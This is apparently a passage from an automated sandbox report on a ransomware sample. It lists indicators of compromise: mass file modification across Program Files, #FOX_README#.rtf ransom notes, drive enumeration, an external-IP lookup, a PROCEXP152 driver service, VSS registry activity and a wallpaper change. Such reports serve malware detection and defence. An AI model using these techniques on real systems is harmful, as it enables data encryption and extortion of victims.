f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Users\Admin\Videos\desktop.ini f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Users\Public\Pictures\desktop.ini f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Users\Public\Videos\Sample Videos\desktop.ini f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Users\Public\Documents\desktop.ini f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\Z1YRRYOY\desktop.ini f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Users\Public\desktop.ini f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Users\Admin\Documents\desktop.ini f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\desktop.ini f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\YAUNGDT1\desktop.ini f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Users\Public\Pictures\Sample Pictures\desktop.ini f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Users\Public\Music\Sample Music\desktop.ini f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\JSOYQ5ME\desktop.ini f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Users\Public\Music\desktop.ini f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Users\Admin\Music\desktop.ini f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Users\Admin\Links\desktop.ini f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Users\Public\Desktop\desktop.ini f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\J: f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened (read-only) \??\H: eSOQugH264.exe File opened (read-only) \??\L: eSOQugH264.exe File opened (read-only) \??\N: eSOQugH264.exe File opened (read-only) \??\S: f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened (read-only) \??\O: f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened (read-only) \??\E: eSOQugH264.exe File opened (read-only) \??\I: eSOQugH264.exe File opened (read-only) \??\T: eSOQugH264.exe File opened (read-only) \??\Z: eSOQugH264.exe File opened (read-only) \??\P: f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened (read-only) \??\M: f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened (read-only) \??\U: eSOQugH264.exe File opened (read-only) \??\X: f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened (read-only) \??\R: f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened (read-only) \??\L: f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened (read-only) \??\E: f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened (read-only) \??\J: eSOQugH264.exe File opened (read-only) \??\Q: eSOQugH264.exe File opened (read-only) \??\R: eSOQugH264.exe File opened (read-only) \??\V: eSOQugH264.exe File opened (read-only) \??\W: eSOQugH264.exe File opened (read-only) \??\N: f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened (read-only) \??\H: f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened (read-only) \??\G: f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened (read-only) \??\A: eSOQugH264.exe File opened (read-only) \??\G: eSOQugH264.exe File opened (read-only) \??\P: eSOQugH264.exe File opened (read-only) \??\S: eSOQugH264.exe File opened (read-only) \??\X: eSOQugH264.exe File opened (read-only) \??\Z: f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened (read-only) \??\U: f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened (read-only) \??\Q: f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened (read-only) \??\I: f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened (read-only) \??\F: f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened (read-only) \??\W: f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened (read-only) \??\V: f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened (read-only) \??\K: f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened (read-only) \??\F: eSOQugH264.exe File opened (read-only) \??\M: eSOQugH264.exe File opened (read-only) \??\O: eSOQugH264.exe File opened (read-only) \??\Y: eSOQugH264.exe File opened (read-only) \??\Y: f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened (read-only) \??\T: f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened (read-only) \??\B: eSOQugH264.exe File opened (read-only) \??\K: eSOQugH264.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 10 myexternalip.com -
Modifies service 2 TTPs 11 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCEXP152 eSOQugH264.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152\Type = "1" eSOQugH264.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152\ErrorControl = "1" eSOQugH264.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152 eSOQugH264.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152\Start = "3" eSOQugH264.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS" eSOQugH264.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2090973689-680783404-4292415065-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\JAnIVzgd.bmp" reg.exe -
Drops file in Program Files directory 3274 IoCs
description ioc Process File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.transport.ecf_1.1.0.v20140408-1354.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Pago_Pago f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Accessibility.api f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Panama f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Chagos f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\javaw.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Auckland f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\unpack200.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\ga\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-options-keymap.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\fa\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\META-INF\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Tucuman f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Kiritimati f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\adobepdf.xdc f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AppConfigInternal.zip f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Guam f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.core.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\RELEASE-NOTES.html f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.rcp.product_5.5.0.165303\feature.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-dialogs_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\cgg\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\rmic.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.felix.gogo.command_0.10.0.v201209301215.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Seoul f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\dailymotion.luac f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core_0.10.100.v20140424-2042.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-autoupdate-ui.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Chatham f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\lt\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT-14 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Beirut f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Legal\ENU\eula.ini f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\mobile_browse.html f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\DenyRestore.bat f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\MeasureLock.docm f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.emf.ecore.xmi_2.10.1.v20140901-1043.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\te\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.SF f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\Vevay f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Manila f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-execution.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.core\cache\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\setEmbeddedCP.bat f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-uihandler_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp.ja_5.5.0.165303\feature.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\Documentation.url f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\sr\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.win32.win32.x86_64.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Extensions\external_extensions.json f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa37.hyp f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Microsoft.NET\RedistList\AssemblyList_4_extended.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbynet.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.text_3.9.1.v20140827-1810.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-ui_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+6 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\meta-index f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_de.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Windhoek f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\win32_CopyDrop32x32.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-ui_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\ffjcext.zip f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-core-startup.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Macquarie f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+2 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-swing-plaf.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-selector-ui.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.commands.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Darwin f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\license.html f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-threaddump.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt04.hsp f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-lib-profiler-ui_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\El_Aaiun f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jmc.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_zh_CN.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\AssemblyInfoInternal.zip f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.bindings_0.10.200.v20140424-2042.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Cape_Verde f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\content-types.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\PPKLite.api f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Samara f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\Interface.zip f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\gimap.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Rankin_Inlet f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\CET f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.ja_5.5.0.165303.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\km\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-masterfs-nio2_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-ui_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\javaws.policy f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-api-visual.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\playlist\twitch.luac f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Shanghai f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Australia\Hobart f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.swt_0.11.101.v20140818-1343.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Mozilla 